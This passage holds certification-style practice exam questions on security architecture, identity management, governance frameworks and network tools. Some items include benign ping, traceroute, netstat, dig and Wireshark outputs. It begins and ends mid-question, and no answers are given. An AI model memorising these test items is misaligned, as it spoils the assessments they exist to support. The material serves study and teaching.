Ethernet II, Src: Cisco_8f:ec:00 (00:1f:c9:8f:ec:00), Dst: Apple_87:8a:73 (98:e0:d9:87:8a:73)
Internet Protocol Version 4, Src: 151.101.185.67, Dst: 10.36.19.226
Internet Control Message Protocol
    Type: 0 (Echo (ping) reply)
    Code: 0
    Checksum: 0xe974 [correct]
    [Checksum Status: Good]
    Identifier (BE): 64424 (0xfba8)
    Identifier (LE): 43259 (0xa8fb)
    Sequence number (BE): 7 (0x0007)
    Sequence number (LE): 1792 (0x0700)
    [Request frame: 1]
    [Response time: 22.029 ms]
    Timestamp from icmp data: Sep 27, 2017 08:46:13.342130000 EDT
    [Timestamp from icmp data (relative): 0.022123000 seconds]
    Data (48 bytes)
        Data: 08090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f...
        [Length: 48]

A. The remote server is reachable over the network.
B. The remote server is not connected to the Internet.
C. Norm’s device is not connected to the Internet.
D. Norm does not have enough information to draw one of the conclusions listed here.

5. Roberta is designing a password policy for her organization and wants to include a control that will limit the length of exposure of an account with a compromised password. Which one of the following controls would best meet Roberta’s goal?

A. Minimum password length
B. Password history
C. Password expiration
D. Password complexity

6. Angela wants to implement multifactor authentication for her organization and has been offered a number of choices. Which of the following choices is not an example of multifactor authentication?

A. Password and retina scan
B. PIN and SMS token
C. Password and security questions
D. Password and SMS token

7. Roland received a security assessment report from a third-party assessor, and it indicated that one of the organization’s web applications is susceptible to an OAuth redirect attack. What type of attack would this vulnerability allow an attacker to wage?

A. Privilege escalation
B. Cross-site scripting
C. SQL injection
D. Impersonation

8. Which role in a SAML authentication flow validates the identity of the user?

A. The SP
B. The IDP
C. The principal
D. The RP

9. Daniel is hiring a third-party consultant who will have remote access to the organization’s data center, but he would like to approve that access each time it occurs. Which one of the following solutions would meet Daniel’s needs in a practical manner?

A. Daniel should keep the consultant’s password himself and provide it to the consultant when needed and then immediately change the password after each use.
B. Daniel should provide the consultant with the password but configure his own device to approve logins via multifactor authentication.
C. Daniel should provide the consultant with the password but advise the consultant that she must advise him before using the account and then audit those attempts against access logs.
D. Daniel should create a new account for the consultant each time she needs to access the data center.

10. Bryan is selecting a firewall to protect his organization’s internal infrastructure from network-based attacks. Which one of the following products is not suitable to meet this need?

A. Cisco NGFW
B. HP TippingPoint
C. CheckPoint appliance
D. Palo Alto NGFW
11. Allan is building a database server that will provide analytics support to a data science team within his organization. The current layout of his organization’s network is shown here. Which network zone would be the most appropriate location for this server?

[Figure: network diagram showing a border router connected to a firewall, with an Internal Network zone behind the firewall]

A. Internet
B. Internal network
C. DMZ
D. New network connected to the firewall



12. Ursula is considering redesigning her network to use a dual firewall approach, such as the one shown here. Which one of the following is an advantage of this approach over a triple-homed firewall?

[Figure: dual firewall network diagram showing a border router, an Internal Network, and a separate segment for Web, DNS, and Email Servers]

A. Increased redundancy
B. Decreased cost
C. Hardware diversity
D. Simplified administration

13. Which one of the following security activities is not normally a component of the operations and maintenance phase of the SDLC?

A. Vulnerability scans
B. Disposition
C. Patching
D. Regression testing

14. Tim is the CIO of a midsize company and is concerned that someone on the IT team may be embezzling funds from the organization by modifying database contents in an unauthorized fashion. What group could investigate this providing the best balance between cost, effectiveness, and independence?

A. Internal assessment by the IT manager
B. Internal audit
C. External audit
D. Law enforcement

15. Chelsea recently accepted a new position as a cybersecurity analyst for a privately held bank. Which one of the following regulations will have the greatest impact on her cybersecurity program?

A. HIPAA
B. GLBA
C. FERPA
D. SOX

16. Emily is charged with the security of her organization’s website. After a conversation with her manager, Emily learned that the organization’s highest priority for her work is the availability of the website in the event of an equipment failure. Which one of the following controls would be most effective in meeting this objective?

A. RAID
B. Web application firewall
C. Load balancing
D. Intrusion prevention systems

17. Catherine is responding to a request for materials from auditors who will be reviewing her organization’s security. She received a request for a list of physical security controls used to protect her organization’s data center. Which one of the following controls does not meet this criterion?

A. Fire suppression system
B. Perimeter fence
C. Exterior lighting
D. Visitor log reviews
18. Brandy works in an organization that is adopting the ITIL service management strategy. Which ITIL core activity includes security management as a process?

A. Service strategy
B. Service design
C. Service transition
D. Service operation


19. Kyle is developing a web application that uses a database backend. He is concerned about the possibility of a SQL injection attack against his application and is consulting the OWASP proactive security controls list to identify appropriate controls. Which one of the following OWASP controls is least likely to prevent a SQL injection attack?

A. Parameterize queries.
B. Validate all input.
C. Encode data.
D. Implement logging and intrusion detection.


20. Alec is a cybersecurity analyst working on analyzing network traffic. He is using Wireshark to analyze live traffic, as shown here. He would like to reassemble all of the packets associated with the highlighted connection. Which one of the following options from the drop-down menu in the figure should he choose first in order to most easily achieve his goal?

[Figure: Wireshark window "Capturing from Wi-Fi: en0" showing a TCP conversation between 209.85.147.125 (port 5222) and 10.36.19.226 (port 50636). Frame 2 is highlighted and its right-click context menu is open.]

First packet in the list: 5222 → 50636 [ACK] Seq=1 Ack=1 Win=221 Len=0 TSval=845189264 TSecr=413918712

Context menu items:
Mark/Unmark Packet
Ignore/Unignore Packet
Set/Unset Time Reference
Time Shift...
Packet Comment...
Edit Resolved Name
Apply as Filter
Prepare a Filter
Conversation Filter
Colorize Conversation
SCTP
Follow
Copy
Protocol Preferences
Decode As...
Show Packet in New Window

Packet details for the highlighted frame:

Frame 2: 78 bytes on wire (624 bits), 78 bytes captured (624 bits) on interface 0
Ethernet II, Src: Cisco_8f:ec:00 (00:1f:c9:8f:ec:00), Dst: Apple_87:8a:73 (98:e0:d9:87:8a:73)
Internet Protocol Version 4, Src: 209.85.147.125, Dst: 10.36.19.226
Transmission Control Protocol, Src Port: 5222, Dst Port: 50636, Seq: 1, Ack: 1, Len: 0
    Source Port: 5222
    Destination Port: 50636
    [Stream index: 0]
    [TCP Segment Len: 0]
    Sequence number: 1 (relative sequence number)
    Acknowledgment number: 1 (relative ack number)
    Header Length: 44 bytes
    Flags: 0x010 (ACK)
    Window size value: 221
    [Calculated window size: 221]
    [Window size scaling factor: -1 (unknown)]
    Checksum: 0xc475 [unverified]
    [Checksum Status: Unverified]
    Urgent pointer: 0
    Options: (24 bytes), No-Operation (NOP), No-Operation (NOP), Timestamps, No-Operation (NOP), No-Operation (NOP), SACK
    [SEQ/ACK analysis]

A. Apply As A Filter
B. Prepare A Filter
C. Conversation Filter
D. Follow

21. Which one of the following events is least likely to trigger the review of an organization’s information security program?

A. Security incident
B. Changes in compliance obligations
C. Changes in team members
D. Changes in business processes

22. Gerry would like to find a physical security control that will protect his organization against an attack where an individual drives a vehicle through the glass doors on the front of the building. Which one of the following would be the most effective way to protect against this type of attack?

A. Mantraps
B. Security guards
C. Bollards
D. Intrusion alarm

23. Roger is the CISO for a midsize manufacturing firm. His boss, the CIO, recently returned from a meeting of the board of directors where she had an in-depth discussion about cybersecurity. One member of the board, familiar with ISO standards in manufacturing quality control, asked if there was an ISO standard covering cybersecurity. Which standard is most relevant to the director’s question?

A. ISO 9000
B. ISO 17799
C. ISO 27001
D. ISO 30170

Questions 24-26 refer to the following scenario:

Martin is developing the security infrastructure for a new business venture that his organization is launching. The business will be developing new products that are considered trade secrets, and it is of the utmost importance that the plans for those products not fall into the hands of competitors.

24. Martin would like to take steps to confirm the reliability of employees and avoid situations where employees might be susceptible to blackmail attempts to obtain the plans. Which one of the following controls would be most effective to achieve that goal?

A. Firewall
B. DLP system
C. Background investigation
D. Nondisclosure agreement
Chapter 4 ■ Domain 4: Security Architecture and Tool Sets

25. Martin would like to install a network control that would block the potential exfiltration of sensitive information from the venture’s facility. Which one of the following controls would be most effective to achieve that goal?

A. IPS
B. DLP system
C. Firewall
D. IDS

26. Several employees will need to travel with sensitive information on their laptops. Martin is concerned that one of those laptops may be lost or stolen. Which one of the following controls would best protect the data on stolen devices?

A. FDE
B. Strong passwords
C. Cable lock
D. IPS

27. Nadine works for a company that runs an e-commerce website. She recently discovered a hacking website that contains password hashes stolen from another e-commerce site. The two sites have a significant number of common users. What user behavior creates significant risk for Nadine’s organization?

A. Use of weak hash functions
B. Reuse of passwords
C. Unencrypted communications
D. Use of federated identity providers

28. Which one of the following systems is not normally considered a component of identity management infrastructure?

A. HR system
B. LDAP
C. Provisioning engine
D. Auditing system

29. Which one of the following is not one of the four domains of COBIT control objectives?

A. Plan and Organize
B. Acquire and Implement
C. Design and Secure
D. Deliver and Support


30. Glenn is conducting a security assessment of his organization’s Active Directory-based identity and access management infrastructure. Which of the following services/protocols represents the greatest security risk to Glenn’s organization if used in conjunction with Active Directory?

A. LDAPS
B. ADFS
C. NTLMv1
D. Kerberos

31. Barney’s organization mandates fuzz testing for all applications before deploying them into production. Which one of the following issues is this testing methodology most likely to detect?

A. Incorrect firewall rules
B. Unvalidated input
C. Missing operating system patches
D. Unencrypted data transmission

32. Lydia worked as a database administrator for her organization for several years before being hired by another internal group to serve as a software developer. During a recent user access review, the security team discovered that Lydia still had administrative rights on the database that were not needed for her current job. Which term best describes this situation?

A. Privilege creep
B. Security through obscurity
C. Least privilege
D. Separation of duties

33. John is reviewing his organization’s procedures for applying security patches and is attempting to align them with best practices. Which one of the following statements is not a best practice for patching?

A. Security patches should be applied as soon as possible.
B. Patches should be applied to production systems first.
C. Patches should be thoroughly tested for unintended consequences.
D. Patches should follow a change management process.

34. Gavin is tracing the activity of an attacker who compromised a system on Gavin’s network. The attacker appears to have used the credentials belonging to a janitor. After doing so, the attacker entered some strange commands with very long strings of text and then began using the sudo command to carry out other actions. What type of attack appears to have taken place?

A. Privilege escalation
B. Phishing
C. Social engineering
D. Session hijacking
35. Jose is concerned that his organization is falling victim to a large number of social engineering attacks. Which one of the following controls is least likely to be effective against these attacks?

A. Network firewall
B. Multifactor authentication
C. Security awareness
D. Content filtering

36. Under the U.S. government’s data classification scheme, which one of the following is the lowest level of classified information?

A. Private
B. Top Secret
C. Confidential
D. Secret

37. Eric leads a team of software developers and would like to help them understand the most important security issues in web application development. Which one of the following sources would provide Eric with the most useful resource?

A. CVE
B. CPE
C. CCE
D. OWASP

38. Carol is running an nmap scan and is confused by the results. It appears that nmap is not scanning a port where she expects to find a running service. What ports does nmap scan if nothing is specified on the command line?

A. 1-1024
B. 1-65535
C. Only ports listed in the nmap-services file
D. Ports from 1-1024 and those listed in the nmap-services file

39. Jeff is preparing a password policy for his organization and would like it to be fully compliant with PCI DSS requirements. What is the minimum password length required by PCI DSS?

A. 7 characters
B. 8 characters
C. 10 characters
D. 12 characters


40. Colin would like to implement a security control in his accounting department that is specifically designed to detect cases of fraud that are able to occur despite the presence of other security controls. Which one of the following controls is best suited to meet Colin’s need?

A. Separation of duties
B. Least privilege
C. Dual control
D. Mandatory vacations

41. Roger is a cybersecurity analyst at a bank. He recently conducted a forensic analysis of the workstation belonging to an IT staff member who was engaged in illicit activity. Roger discovered that the employee was capturing and storing cookies from user sessions as they were sent between backend systems. What type of attack might the employee have been conducting?

A. Privilege escalation
B. Covert channel
C. Session hijacking
D. SQL injection

42. Rob is an auditor reviewing the payment process used by a company to issue checks to vendors. He notices that Helen, a staff accountant, is the person responsible for creating new vendors. Norm, another accountant, is responsible for issuing payments to vendors. Helen and Norm are cross-trained to provide backup for each other. What security issue, if any, exists in this situation?

A. Least privilege violation
B. Separation of duties violation
C. Dual control violation
D. No issue

43. Arnie is required to submit evidence from systems on his network to external legal counsel as part of a court case. What technology can he use to demonstrate that the copies of evidence he is producing are genuine?

A. Disk duplicator
B. Hash function
C. Cloud storage service
D. Write blocker
44. Bob is considering the deployment of OpenSSL in his environment and would like to select a secure cipher suite. Which one of the following ciphers should not be used with OpenSSL?

A. DES
B. AES
C. RSA
D. ECC

45. Tammy is reviewing alerts from her organization’s intrusion prevention system and finds that there are far too many alerts to review. She would like to narrow down the results to attacks that had a high probability of success. What information source might she use to correlate with her IPS records to achieve the best results?

A. Vulnerability scans
B. Firewall rules
C. Port scans
D. IDS logs

46. In the Sherwood Applied Business Security Architecture (SABSA), which view corresponds to the logical security architecture?

A. Builder’s view
B. Tradesman’s view
C. Designer’s view
D. Architect’s view

47. Frank’s organization recently underwent a security audit that resulted in a finding that the organization fails to promptly remove the accounts associated with users who have left the organization. This resulted in at least one security incident where a terminated user logged into a corporate system and took sensitive information. What identity and access management control would best protect against this risk?

A. Automated deprovisioning
B. Quarterly user account reviews
C. Separation of duties
D. Two-person control

48. Jay is the CISO for his organization and is responsible for conducting periodic reviews of the organization’s information security policy. The policy was written three years ago and has undergone several minor revisions after audits and assessments. Which one of the following would be the most reasonable frequency to conduct formal reviews of the policy?

A. Monthly
B. Quarterly
C. Annually
D. Every five years
49. Alvin is working with a new security tool, as shown here. This tool collects information from a variety of sources and allows him to correlate records to identify potential security issues. What type of tool is Alvin using?

[Figure: web console with the top-level menu DASHBOARDS, ANALYSIS, ENVIRONMENT, REPORTS, CONFIGURATION and an Overview page with the tabs EXECUTIVE, TICKETS, SECURITY, TAXONOMY. Panels shown: Top 10 Promiscuous Hosts; Security Events: Top 5 Alarms; Security Events: Top 5 Events; Top 10 Hosts with Multiple Events; Security Events Trend: Last Day; Security Events Trend: Last Week. The host panels list internal and external IP addresses, and the trend panels plot event counts per hour (9h through 0h) and per day (10 Oct through 16 Oct).]
50. Al is a cybersecurity analyst for a company that runs a website that allows public postings. Users recently began complaining that the website is showing them pop-up messages asking for their passwords that don’t seem legitimate. At the same time, there has been an uptick in compromised user accounts. What type of attack is likely occurring against Al’s website?

A. SQL injection
B. Cross-site scripting
C. Cross-site request forgery
D. Rootkit
Questions 51-53 refer to the following scenario:

Travis is troubleshooting the firewall rulebase that appears here:

Rule  Action  Protocol  Source IP      Source Port  Destination IP  Destination Port
1     allow   UDP       any            any          10.15.1.1       25
2     block   TCP       any            any          10.15.1.2       80
3     allow   TCP       10.20.0.0/16   any          10.15.1.2       80
4     allow   TCP       any            any          10.15.1.3       22

51. Users are reporting that inbound mail is not reaching their accounts. Travis believes that rule 1 should provide this access. The organization’s SMTP server is located at 10.15.1.1. What component of this rule is incorrect?

A. Protocol
B. Source port
C. Destination IP
D. Destination port

52. The firewall rule creators intended to block access to a website hosted at 10.15.1.2 except from hosts located on the 10.20.0.0/16 subnet. However, users on that subnet report that they cannot access the site. What is wrong?

A. The protocol is incorrect.
B. The rules are misordered.
C. The source port is not specified.
D. There is no error in the rule, and Travis should check for other issues.

53. Rule 4 is designed to allow ssh access from external networks to the server located at 10.15.1.3. Users are reporting that they cannot access the server. What is wrong?

A. The protocol is incorrect.
B. The rules are misordered.
C. The destination port is incorrect.
D. There is no error in the rule, and Travis should check for other issues.

54. Carl does not have sufficient staff to conduct 24/7 security monitoring of his network. He wants to augment his team with a managed security operations center service. Which one of the following providers would be best suited to provide this service?

A. MSSP
B. IaaS
C. PaaS
D. SaaS


55. Ian is designing an authorization scheme for his organization’s deployment of a new accounting system. He is considering putting a control in place that would require that two accountants approve any payment request over $100,000. What security principle is Ian seeking to enforce?

A. Security through obscurity
B. Least privilege
C. Separation of duties
D. Dual control

56. Ryan is concerned about the possibility of a distributed denial-of-service attack against his organization’s customer-facing web portal. Which one of the following types of tests would best evaluate the portal’s susceptibility to this type of attack?

A. Regression testing
B. Load testing
C. Integration testing
D. User acceptance testing

57. Hank would like to deploy an intrusion prevention system to protect his organization’s network. Which one of the following tools is least likely to meet his needs?

A. Snort
B. Burp
C. Sourcefire
D. Bro

58. Which one of the following connection status messages reported by netstat indicates an active connection between two systems?

A. ESTABLISHED
B. LISTENING
C. LAST_ACK
D. CLOSE_WAIT

59. Greg is investigating reports of difficulty connecting to the CompTIA website and runs a traceroute command. He receives the results shown here. What conclusion can Greg reach from these results?

laptop:~: traceroute www.comptia.org
traceroute to www.comptia.org (198.134.5.6), 64 hops max, 52 byte packets
 1  10.36.16.1 (10.36.16.1)  2.362 ms  1.317 ms  1.309 ms
 2  172.21.0.5 (172.21.0.5)  1.288 ms  1.400 ms  1.506 ms
 3  172.21.255.129 (172.21.255.129)  1.659 ms  1.777 ms  1.648 ms
 4  172.21.248.66 (172.21.248.66)  2.116 ms  2.123 ms  2.080 ms
 5  xe-0-0-4.404.rtr.1ll.indiana.gigapop.net (149.165.183.29)  7.361 ms  7.431 ms  7.649 ms
 6  lo-0.1.rtr.ictc.indiana.gigapop.net (149.165.255.1)  7.783 ms  7.732 ms  7.652 ms
 7  10ge12-5.core1.indi.he.net (184.105.35.193)  7.618 ms  8.314 ms  7.444 ms
 8  10ge7-16.core2.chi1.he.net (184.105.64.170)  13.694 ms  13.868 ms  57.656 ms
 9  xo-a515-as2828.10gigabitethernet3-5.core2.chi1.he.net (184.105.38.114)  15.012 ms  14.801 ms  14.668 ms
10  vb2001.rar3.chicago-il.us.xo.net (207.88.13.130)  14.867 ms  15.056 ms  14.963 ms
11  216.156.16.199.ptr.us.xo.net (216.156.16.199)  14.789 ms  15.016 ms  15.017 ms
12  216.55.11.62 (216.55.11.62)  16.522 ms  16.797 ms  16.519 ms
13  * * *
14  * * *
15  * * *
16  * * *
17  www.comptia.org (198.134.5.6)  16.522 ms  16.797 ms  16.519 ms

A. The web server appears to be up and running on the network.
B. The *s in the results indicate a network failure on Greg’s network.
C. The *s in the results indicate a network failure on the CompTIA network.
D. The *s in the results indicate a network failure between Greg’s network and the CompTIA network.


Questions 60-64 refer to the following scenario: 


Tom connects to a website using the Chrome web browser. The site uses TLS 
encryption and presents the digital certificate shown here. 


[Figure: certificate viewer showing the chain Starfield Services Root Certificate Authority - G2 > Amazon Root CA 1 > Amazon > *.nd.edu, with the *.nd.edu certificate selected]

*.nd.edu
Issued by: Amazon
Expires: Tuesday, March 6, 2018 at 7:00:00 AM Eastern Standard Time
This certificate is valid

Details
Subject Name
    Common Name: *.nd.edu
Issuer Name
    Country: US
    Organization: Amazon
    Organizational Unit: Server CA 1B
    Common Name: Amazon
Serial Number: 05 54 D6 BA 6F B7 87 D0 5D 41 68 C1 48 8B 42 64
Version: 3
Signature Algorithm: SHA-256 with RSA Encryption ( 1.2.840.113549.1.1.11 )
Parameters: none
Not Valid Before: Sunday, February 5, 2017 at 7:00:00 PM Eastern Standard Time
Not Valid After: Tuesday, March 6, 2018 at 7:00:00 AM Eastern Standard Time
Public Key Info
    Algorithm: RSA Encryption ( 1.2.840.113549.1.1.1 )
    Parameters: none
    Public Key: 256 bytes : B0 5A 73 D5 F3 01 D7 4F ...
    Exponent: 65537
    Key Size: 2048 bits
    Key Usage: Encrypt, Verify, Wrap, Derive
Signature: 256 bytes : B9 C6 D8 1C E9 26 DC BA ...

60. Who created the digital signature shown in the last line of this digital certificate?

A. Starfield Services
B. Amazon
C. nd.edu
D. RSA

61. Which one of the following websites would not be covered by this certificate?

A. nd.edu
B. www.nd.edu
C. www.business.nd.edu
D. All of these sites would be covered by the certificate.

62. What encryption key does the certificate contain?

A. The website’s public key
B. The website’s private key
C. Tom’s public key
D. Tom’s private key

63. After Tom initiates a connection to the website, what key is used to encrypt future communications from the web server to Tom?

A. The website’s public key
B. The website’s private key
C. Tom’s public key
D. The session key

64. What cryptographic algorithm is used to protect communications between Tom and the web server that take place using the key identified in question 63?

A. RSA
B. SHA-256
C. AES
D. It is not possible to determine this information.

65. Kaitlyn’s organization recently set a new password policy that requires that all passwords have a minimum length of 10 characters and meet certain complexity requirements. She would like to enforce this requirement for the Windows systems in her domain. What type of control would most easily allow this?

A. Group Policy object
B. Organizational unit
C. Active Directory forest
D. Domain controller

66. Which one of the following security controls is designed to help provide continuity for security responsibilities?

A. Succession planning
B. Separation of duties
C. Mandatory vacation
D. Dual control
67. Gwen would like to deploy an intrusion detection system on her network but does not have funding available to license a commercial product. Which one of the following is an open source IDS?

A. Sourcefire
B. Bro
C. TippingPoint
D. Proventia

68. John is planning to deploy a new application that his company acquired from a vendor. He is unsure whether the hardware he selected for the application is adequate to support the number of users that will simultaneously connect during peak periods. What type of testing can help him evaluate this issue?

A. User acceptance testing
B. Load testing
C. Regression testing
D. Fuzz testing

69. Tammy would like to ensure that her organization’s cybersecurity team reviews the architecture of a new ERP application that is under development. During which SDLC phase should Tammy expect the security architecture to be completed?

A. Analysis and requirements definition
B. Design
C. Development
D. Testing and integration

70. Which one of the following items is not normally included in a request for an exception to security policy?

A. Description of a compensating control
B. Description of the risks associated with the exception
C. Proposed revision to the security policy
D. Business justification for the exception

71. Mike’s organization adopted the COBIT standard, and Mike would like to find a way to measure their progress toward implementation. Which one of the following COBIT components is useful as an assessment tool?

A. Process descriptions
B. Control objectives
C. Management guideline
D. Maturity models

72. What policy should contain provisions for removing user access upon termination?

A. Data ownership policy
B. Data classification policy
C. Data retention policy
D. Account management policy


73. Suzanne is the CISO at a major nonprofit hospital group. Which one of the following
regulations most directly covers the way that her organization handles medical records?

A. HIPAA
B. FERPA
C. GLBA
D. SOX

Questions 74-76 refer to the following scenario:

Karen is the CISO of a major manufacturer of industrial parts. She is currently performing
an assessment of the firm's financial controls, with an emphasis on implementing security
practices that will reduce the likelihood of theft from the firm.

74. Karen would like to ensure that the same individual is not able to both create a new
vendor in the system and authorize a payment to that vendor. She is concerned that an
individual who could perform both of these actions would be able to send payments to
false vendors. What type of control should Karen implement?

A. Mandatory vacations
B. Separation of duties
C. Job rotation
D. Two-person control

75. The accounting department has a policy that requires the signatures of two individuals on
checks valued over $5,000. What type of control do they have in place?

A. Mandatory vacations
B. Separation of duties
C. Job rotation
D. Two-person control

76. Karen would also like to implement controls that would help detect potential malfeasance
by existing employees. Which one of the following controls is least likely to detect
malfeasance?

A. Mandatory vacations
B. Background investigations
C. Job rotation
D. Privilege use reviews

77. Johann is troubleshooting a network connectivity issue and would like to determine the
path that packets follow from his system to a remote host. Which tool would best assist
him with this task?

A. ping
B. netstat
C. tracert
D. ipconfig
78. Kyle runs the netstat command on a Linux server and sees the results shown here. Which
one of the following services is being used for an active remote connection to this server?

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address                 Foreign Address           State
tcp        0      0 *:ssh                         *:*                       LISTEN
tcp        0      0 localhost:smtp                *:*                       LISTEN
tcp        0      0 *:mysql                       *:*                       LISTEN
tcp        0    252 ip-172-30-0-60.ec2.inte:ssh   …236.174:53623            ESTABLISHED
tcp        0      0 *:http                        *:*                       LISTEN
tcp        0      0 *:ssh                         *:*                       LISTEN
tcp        0      0 *:https                       *:*                       LISTEN
tcp        0      0 ip-172-30-0-60.ec2.int:http   ::ffff:…236.174:53632     ESTABLISHED
tcp        0      0 ip-172-30-0-60.ec2.int:http   ::ffff:…236.174:53634     TIME_WAIT
tcp        0      0 ip-172-30-0-60.ec2.int:http   ::ffff:…236.174:53633     ESTABLISHED
udp        0      0 *:bootpc                      *:*
udp        0      0 ip-172-30-0-60.ec2.inter:ntp  *:*
udp        0      0 localhost:ntp                 *:*
udp        0      0 *:ntp                         *:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ACC ]     STREAM     LISTENING     10473    /var/lib/mysql/mysql.sock
unix  2      [ ACC ]     STREAM     LISTENING     9227     /var/run/lvm/lvmetad.socket
unix  2      [ ACC ]     STREAM     LISTENING     9242     /var/run/lvm/lvmpolld.socket
unix  2      [ ACC ]     STREAM     LISTENING     8423     @/com/ubuntu/upstart
unix  2      [ ACC ]     STREAM     LISTENING     9876     /var/run/acpid.socket
unix  2      [ ACC ]     SEQPACKET  LISTENING     8693     @/org/kernel/udev/udevd
unix  2      [ ACC ]     STREAM     LISTENING     9792     /var/run/dbus/system_bus_socket
unix  10     [ ]         DGRAM                    9706     /dev/log
unix  2      [ ]         DGRAM                    10643
unix  3      [ ]         STREAM     CONNECTED     9796
unix  3      [ ]         STREAM     CONNECTED     107364
unix  2      [ ]         DGRAM                    11674
unix  2      [ ]         DGRAM                    10530
unix  2      [ ]         DGRAM                    10551
unix  2      [ ]         DGRAM                    13676
unix  3      [ ]         STREAM     CONNECTED     9795
unix  3      [ ]         STREAM     CONNECTED     107365
unix  2      [ ]         DGRAM                    107361
unix  2      [ ]         DGRAM                    9873
unix  3      [ ]         STREAM     CONNECTED     9653
unix  3      [ ]         DGRAM                    8701
unix  3      [ ]         DGRAM                    8702
unix  3      [ ]         STREAM     CONNECTED     9801     /var/run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     9800
unix  2      [ ]         DGRAM                    10241
unix  3      [ ]         STREAM     CONNECTED     9654
[ec2-user@ip-172-30-0-60 ~]$

A. SSH
B. HTTPS
C. MySQL
D. NTP
79. Which one of the following statements about web proxy servers is incorrect?

A. Web proxy servers decrease the speed of loading web pages.
B. Web proxy servers reduce network traffic.
C. Web proxy servers can filter malicious content.
D. Web proxy servers can enforce content restrictions.

80. Bruce is concerned about access to the master account for a cloud service that his company
uses to manage payment transactions. He decides to implement a new process for multifactor
authentication to that account where an individual on the IT team has the password
to the account, while an individual in the accounting group has the token. What security
principle is Bruce using?

A. Dual control
B. Separation of duties
C. Least privilege
D. Security through obscurity


81. Lorissa is investigating a potential DNS poisoning attack and uses the dig command to
look up the IP address associated with the CompTIA.org website. She receives the results
shown here. Which statement is true about these results?

[08:35:51] $ dig comptia.org

; <<>> DiG 9.8.3-P1 <<>> comptia.org
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27169
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;comptia.org.                   IN      A

;; ANSWER SECTION:
comptia.org.            58      IN      A       198.134.5.6

;; Query time: 27 msec
;; SERVER: 172.30.25.8#53(172.30.25.8)
;; WHEN: Sat Aug 26 08:35:54 2017
;; MSG SIZE  rcvd: 45

A. The DNS query was answered by a server located at 198.134.5.6, which is not
authoritative for the domain.
B. The DNS query was answered by a server located at 198.134.5.6, which is
authoritative for the domain.
C. The DNS query was answered by a server located at 172.30.25.8, which is not
authoritative for the domain.
D. The DNS query was answered by a server located at 172.30.25.8, which is
authoritative for the domain.

82. Which of the following protocols is best suited to provide authentication on an open network?

A. TACACS
B. RADIUS
C. TACACS+
D. Kerberos

83. Eric is assessing the security of a Windows server and would like assistance with
identifying the users who have access to a shared file directory. What Sysinternals tool can
assist him with this task?

A. AutoRuns
B. SDelete
C. Sysmon
D. AccessEnum
84. What identity management protocol is typically paired with OAuth2 to provide
authentication services in a federated identity management solution on the Web?

A. Kerberos
B. ADFS
C. SAML
D. OpenID

85. Laura is working on improving the governance structures for enterprise architecture in her
organization in an effort to increase the communication between the architects and the
security team. In the TOGAF framework, which of the four domains is Laura operating?

A. Business architecture
B. Applications architecture
C. Data architecture
D. Technical architecture

86. Rob is planning the security testing for a new service being built by his organization's IT
team. He would like to conduct rigorous testing of the finished product before it is released
for use. Which environment would be the most appropriate place to conduct this testing?

A. Development
B. Test
C. Staging
D. Production

87. Colin would like to find a reputable source of information about software vulnerabilities
that was recently updated. Which one of the following sources would best meet his needs?

A. OWASP
B. SANS
C. Microsoft
D. Google

88. Lou would like to deploy a SIEM in his organization, but he does not have the funding
available to purchase a commercial product. Which one of the following SIEMs uses an
open source licensing model?

A. AlienVault
B. QRadar
C. ArcSight
D. OSSIM


89. Bruce is considering the acquisition of a software testing package that allows programmers
to provide their source code as input. The package analyzes the code and identifies any
potential security issues in the code based upon that analysis. What type of analysis is the
package performing?

A. Static analysis
B. Fuzzing
C. Dynamic analysis
D. Fault injection

90. Tim is tasked with implementing multifactor authentication to bring his organization into
compliance with an industry security regulation. Which one of the following combinations
of systems would make the strongest multifactor authentication solution?

A. Password and security question answers
B. Fingerprint and retinal scan
C. ID badge and PIN
D. Password and PIN

91. In the Sherwood Applied Business Security Architecture (SABSA), which view corresponds
to the physical security architecture layer?

A. Architect's view
B. Designer's view
C. Builder's view
D. Tradesman's view

92. Which one of the following Sysinternals tools may be used to determine the permissions
that individual users have on a Windows registry key?

A. Sysmon
B. AccessEnum
C. AutoRuns
D. ProcDump

93. Amy is creating application accounts for her company's suppliers to use to access an
inventory management website. She is concerned about turnover at the vendor. Which one of
the following approaches would provide a good balance of security and usability for Amy?

A. Amy should create a single account for the vendor and require the password be
changed whenever an employee with knowledge of the password leaves the vendor.
B. Amy should create individual accounts for each vendor employee and require that the
vendor inform her when an employee leaves.
C. Amy should create individual accounts for each vendor employee and require that the
vendor immediately change the password for the account of any employee who leaves.
D. Amy should create a master account for a responsible individual at the vendor and
allow them to create and manage individual user accounts.
94. In the TOGAF Architecture Development Model, shown here, what element should
occupy the blank line in the center circle?

[Figure: TOGAF ADM cycle. Outer phases: Prelim: Framework and Principles; A: Architecture
Vision; B: Business Architecture; C: Information System Architectures; D: Technology
Architecture; E: Opportunities and Solutions; F: (label not legible in the scan); G:
Implementation Governance; H: Architecture Change Management. The center circle, connected
to every phase, is blank.]

A. Security
B. Architecture
C. Requirements
D. Controls


95. Rick is assessing the security of his organization's directory services environment. As part
of that assessment, he is conducting a threat identification exercise. Which one of the
following attacks specifically targets directory servers?

A. Man-in-the-middle
B. LDAP injection
C. SASL skimming
D. XSS

Chapter 4  Domain 4: Security Architecture and Tool Sets  219

96. Which one of the following vulnerability scanning tools is limited to collecting
information from systems running a specific operating system?

A. Nikto
B. OpenVAS
C. MBSA
D. Qualys

97. Samantha is investigating a cybersecurity incident where an internal user used his
computer to participate in a denial-of-service attack against a third party. What type of policy
was most likely violated?

A. AUP
B. SLA
C. BCP
D. Information classification policy

98. Brenda would like to select a tool that will assist with the automated testing of
applications that she develops. She is specifically looking for a tool that will automatically
generate large volumes of inputs to feed to the software. Which one of the following tools would
best meet her needs?

A. Peach
B. Burp
C. ZAP
D. ModSecurity

99. Paul is selecting an interception proxy to include in his organization's cybersecurity
toolkit. Which one of the following tools would not meet this requirement?

A. ZAP
B. Vega
C. Burp
D. Snort

100. What are the four implementation tiers of the NIST Cybersecurity Framework, ordered
from least mature to most mature?

A. Partial, Risk Informed, Repeatable, Adaptive
B. Partial, Repeatable, Risk Informed, Adaptive
